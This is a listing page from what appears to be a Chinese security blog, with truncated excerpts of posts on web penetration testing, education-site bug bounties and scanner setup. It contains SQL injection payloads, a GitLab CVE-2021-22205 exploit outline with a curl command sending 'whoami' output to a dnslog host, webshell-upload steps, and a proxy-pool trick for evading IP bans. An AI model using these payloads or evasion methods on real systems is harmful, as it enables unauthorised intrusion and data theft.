- 博客(105)
- 资源 (1)
- 收藏
- 关注
RSS订阅
原创 记一次团队成员绕过waf来cms报错注入
记一次团队成员绕过waf来cms报错注入 作者:ECHO:前言: 最近事多,随便抽个来写写,团队的某个大哥要打hvv,丢了个mssql的站,说是有waf,想搞搞数据和shell无图,通过fuzz,发现逻辑运算1-if()这种是可以用的,, 但不知道sql语句怎么构造,,在后面加了一堆语句后,报了个insert语句的错,后面就丢给up哥来闭合了,ok,成功闭合,闭合语句:a’,1,1,1,1)–+ 能注了,up哥yyds!然后就是:Payload三个探针: 不用conv
2022-05-30 11:19:05
740
原创 有手就行系列-一周拿下4个Edu证书站
有手就行系列-一周拿下4个Edu证书站 作者ECHO:前言:最近事情有点多,原本初心是两周一篇文,现在远远超时间了,主要写文章很麻烦,有时候一句话说清楚,但要去解释清楚,时间花在解释上了。前段时间打了几个证书站,打出了四个证书,,来水个笔记0x01.某电科大弱口令已经修复了,就发出来了,电科大的站不知道被多少大佬摸过了,,打过一些站,看到有登录的地方就有几率出洞,我都会去看看,能不能进去一种说法,起码外网不是那种恶心人的僵尸站群。很标准的UI设计啊,主站的管理web果然
2022-05-16 22:34:35
1780
2
原创 4.09.业务逻辑漏洞笔记-某高校外网资产前端验证
前言: 首先呢,写这些东西,都是为了记录平时挖逻辑的日常,,我注重于第一视角,平时怎么学的这些漏洞,实战怎么碰到怎么去思考? 不一定得有成果,不喜勿喷,谢谢理解。。信息收集:这次没收集到学号,SFZ,手机号等信息,,打不了学工系统,,只能打打外网资产,,找到一处直播系统。然后看到数据包请求这个接口地址; 发现短信发送成功了,,看出他发短信的逻辑是先不校验是否存在该用户,,发了短信后在检验。通过他的js包看到,,重置密码只要有一个code值为1,就能绕过验证,然后尝试看看能不能
2022-04-09 09:40:52
3055
原创 Qaseem安全团队- 云函数搭建高质量代理池
Qaseem安全团队- 云函数搭建高质量代理池挖掘src或渗透经常碰到waf或者服务器策略ban了ip的情况,很影响挖洞的节奏,最近朋友给推了云函数搭建代理池的思路,确实挺好用,白嫖云函数。云函数(Serverless Cloud Function,SCF)是云计算厂商为企业和开发者们提供的无服务器执行环境,可在无需购买和管理服务器的情况下运行代码,云函数存在非常多的出口ip,我们要做的把http请求转发到云函数提供的api上,![]1.登录腾讯云,搜索云函数,然后自定义一个项目,具体可以看这位哥
2022-01-16 11:30:23
5158
1
原创 实战-记一次edu证书站getshell
本来前几天就写了,但后来挖了个同济的,想等审核后再一块写,结果今天,真的不想说话,又重复了,哥几个太卷了,,01.站点首页02.然后发现注册功能正常,,(不要问为啥正常,说明可能没被提过)03.由于这个站漏洞是团队成员发现的,搞不出数据不想和edu扯皮,发出来,发现后台存在问题,,04.后台是php的站点,意味着什么?意味挖掘要多注意注入,如果是jsp的站点,意味着什么? 意味挖掘多注意逻辑,(java有预编译,注入很少)发现注入常见参数cateforld,(如果是前台,有cid,tid这种
2022-01-14 21:46:22
1967
1
原创 实战渗透浅谈--记一次傀儡注入工具到Getshell
时间: 2020-04 这是当时拿到第一个WEBSHELL,自己摸导出来的,思路比较简单,没有防护,,1.掏出傀儡注入工具,(确实这一款工具比较牛逼,,)2.拿出pangolin,找到某后台注入(现在这些自动化工具需要改改才能用了)3站点没有防护(直接Dump出 admin和hash)4.通过御剑/dirsearch等工具探测到后台路径为/login.php(估计是个废站)5.登录后台,看到没啥功能点,锁定在logo处,5.发现头像处没有做上传类型过滤,burp更改后缀6.访问发
2021-12-25 19:00:21
1410
原创 HACK学习黑帽子Python--Gitlab远程代码执行(CVE-2021-22205)脚本构造Poc
前言: 作为一名白帽,写脚本能快速的在挖洞过程中快速的批量验证。为了让笔记更有实用性,这里以poc的形式:Gitlab由于文件解析器对上传的dvju格式的jpg文件校验不严,导致远程代码执行RCE,Poc利用链:01.获取"/users/sign_in"页面的session,得到返回包的X-CSRF-Token,02.利用’X-CSRF-Token’ 请求"/uploads/user" 上传页面,03.构造带有dnslog命令的poc图片 dnglog_cmd = "curl whoami.xX
2021-12-06 10:32:15
1612
原创 实战渗透浅谈--一次巧合偶然的sql注入
一直以来,都想摆脱sqlmap的束缚,通过自定义脚本来完成,–前言某月某天,挖盒子过程中,burpsuite扫出某个sqli,花了点时间测了下,确实有些搞头。是一个from子查询payload,select*from(select sleep(10))a ,from会把后面的结果(在这里是子查询)当作单表来查询,发包后,burpsuite返回包1154millls,存在sql注入,,不知道有多久没手工注入了,放sqlmap看能不能跑点数据出来如图,referer注入设置level 3 ,time-
2021-11-30 15:51:12
5407
3
原创 HACK学习黑帽子Python--漏洞检测脚本快速编写
前言: 作为一名白帽,写脚本能快速的在挖洞过程中快速的批量验证。为了让笔记更有实用性,这里以poc的形式:01.如何发送HTTP请求GET型: 01.有表单参数 request.get(url=url,params={}) params可以先用payload={‘username’:‘admin’}先代替然后 params=payload02.requests.get(url)POST型: 01.request.post(url,params={}),params同上02.requests
2021-11-15 11:02:56
2883
1
原创 白帽子挖洞第III篇作业--xray工具配置代理池(1)
这个问题在很早之前就有人反复提过了,某手注找到注入点,被某防护ban了ip,无奈,有了代理池的出现。xray是支持代理池的,可以参考Freebuf这https://www.freebuf.com/articles/web/281374.html01.Xray漏扫的流量、与用户交互流量、web页面交互流量全部经过代理池如果代理池 出口IP被封禁,那么用户浏览器也不能与网站交互。02.xray上游代理,漏扫流量直接转发给主机,不经过代理池,访问web端IP为代理池出口IP在19年以后git上,代
2021-11-11 16:15:56
2773
原创 白帽子挖洞第II篇作业--xray+fofa主动扫描
在去年到今年期间,出现了fofa2xray这样通过调用fofa的api,配合xray的被动扫描,实现挖洞。本人有幸花了点时间搭好环境,但在确定api已经调用成功后,发现无法返还数据,如图得出的结果:也许只有开发者的脚本只有开发者才能调用。看了fofa2xray的config源码后产生构想简陋的源码,能不能自己通过fofa-gui导出结果然后xray扫描呢?网上找了一下,发现真的有大佬想到一块了,https://cloud.tencent.com/developer/article/1759
2021-11-10 15:14:53
1924
原创 白帽子挖洞第I篇作业--burp与xray联动笔记
继xray+awvs联动后,需要配置xray与burp联动,有师傅说过,单个工具扫描深度不够,扫描不出任何东西也扫描不到发送的数据包。多换几套工具,xray+awvs or xray+crawlergo爬虫,结果可能有mssql 也可能有目录遍历,针对点不同。内容比较基础,要的是扎扎实实,算不上干货。01.配置浏览器上游代理,流量转发给burp端口8081,02.流量转发burp,burp和主机通信,如果抓包放包出问题,看下面https://blog.youkuaiyun.com/qq_42630215
2021-11-06 09:34:19
3715
原创 白帽子挖洞第IV篇作业--谈谈xray与awvs联动笔记
xray在2021年11月更新到了1.8,由于之前的1.7已经被crack,这里环境就用1.7一:xray的相关命令xray的核心命令01代理被动扫描(重点)xray.exe webscan --listen 127.0.0.1:7777 --html-output xx.html02.爬虫扫描(不建议)xray.exe --basic-crawler http://example.com03.指定插件扫描–plugins xss,cmd_injection加载本地 /xxx/ 目录所
2021-11-05 21:11:29
981
2
原创 白帽子挖洞作业第V篇作业--那些实用挖洞fofa语句总结
fofa信息收集:fofa支持搜索http头部的内容 二次过滤 比如配合host进一步筛选漏洞主机host=".edu.cn" && header=“apache”fofa支持搜索html正文的内容 ,比如 xxx公司 配合host可以找出某个机构or学校的包含xx公司漏洞资产。或者直接xxx公司批量0day,host=".edu.cn" && body=“xxx公司” or host=".edu.cn" && body="/admin/
2021-11-03 11:33:49
806
原创 渗透人员如何在办公室优雅从容的使用打印机?
做技术的,不了解啥东西,说来什么就来什么 --2021.09.27作为一名渗透人员,需要学会打印机的使用,不然在办公室处境很难受。公司的打印机联想的某个牌子,打印效果和常用的佳能和惠普不同,吃了不少苦头。1.打印的时候**要定量,**不能打多,也不能过慢。2.最重要的不能打错,一大片白花花的出来,还不能停止留下的只有绝望。这里最经典的word文档...
2021-09-27 17:48:38
408
原创 日常工作运维: 渗透测试减少win系统本身的开支
为了提高工作效率: 可以通过运行窗口来调用win组件:常用的运行msc程序Services.msc 调用服务 在windows/sys32的文件夹里devmgmt.msc 调用设备管理器gpedit.msc 调用组策略 在windows/sys32的文件夹里Taskmgr 调用任务管理器Cmd 调用cmd窗口 calc 调用计算器 recent 调用最近痕迹Regedit 调用注册表 msconfig 服务小插件============关闭管理员账号:Net user
2021-09-13 15:33:05
211
原创 u盘被写保护的特征分析-目前网上几种主流方式
这东西也是最近碰到的,有一次u盘在机房插入后传数据,机房的设备很差很卡,中断了,然后被写保护了。琢磨了网上给的几种方案,,第一种,注册表在这个位置,插入一个键值,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Storage\StorageDevicePolicies在sys目录下有个diskpart.exe 的硬盘配置文件第二种,如果盘是杂盘,抱歉,没有可能识别出主控注意看他的权限不管当前是sys administrator 或者
2021-09-05 10:40:09
345
1
原创 实战渗透-记一次文件上传拿到aspx站点(1)
这两天实在有些忙,,前段时间拿到的某个SHELL,今天打算放放,接着挖信息泄露站点大概是这样的,,http://ABC.xxxx.xxx.cn/HxxQxx/login 登录地址登录后台后,拿到后台管理权限找到两个上传点1.植物处的一处文件上传2.新闻管理的一处上传,在第一处上传附件是保存为图片,,burp抓包看到解析的内容有些多,抓包改包结果没成功,第二处上传附件从站点首页看到有docx,excel等类型,,这个地方大概率能传马抓包的时候有safedog-flow-item字段,,传
2021-09-01 08:52:47
673
1
原创 在实际渗透环境下如何有价值进行目录探测?用dirsearch真实演绎如何探测
记上一篇Debian配置python3.7环境后,吧dirsearch通过sshd的协议本地传到公网,这里就有人问了, 本地不好嘛?公网更隐蔽,,Debian内核效应高,,响应快这一点是大多数渗透测试喜爱Debain的原因。3.缺点,不是很友好,(这里的不友好是玩的转有些困难,不是傻瓜式的)在用之前,我这里参考坏哥的扫描器图形化的好处就在于好配置,,,但他响应慢,内核不是C这种高效率写的,兼容性很差,,坏哥确实好用,但很容易出问题,所以转向命令行的dirsearch。目前dirsear
2021-08-30 09:19:22
409
1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人